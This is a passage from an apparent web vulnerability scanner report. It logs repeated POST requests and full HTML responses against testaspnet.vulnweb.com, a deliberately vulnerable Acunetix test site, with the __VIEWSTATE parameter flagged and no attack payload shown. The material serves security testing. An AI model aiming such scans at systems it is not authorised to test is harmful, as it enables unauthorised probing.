style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8283&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAe5PRjtoIZGRk6EH0s2Z8ka%2BzM%2BHMwle2HsYRUt4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLC4fnwBQLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAtfo7qqaH3H0sjFNlbLFb1KND5Fx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:00:17 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAe5PRjtoIZGRk6EH0s2Z8ka+zM+HMwle2HsYRUt4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLC4fnwBQLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAtfo7qqaH3H0sjFNlbLFb1KND5Fx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:White" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1187 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,187 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8287&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAIj32kdoIZGRkIAQ7DtgU%2BM%2F4TsgvNv12Uei0f04%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL77a3%2FDgLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAvpTZQqHZ47lrxL%2B5jyVJjA7Fcot
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:11:53 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAIj32kdoIZGRkIAQ7DtgU+M/4TsgvNv12Uei0f04=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL77a3/DgLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAvpTZQqHZ47lrxL+5jyVJjA7Fcot" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:White" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" 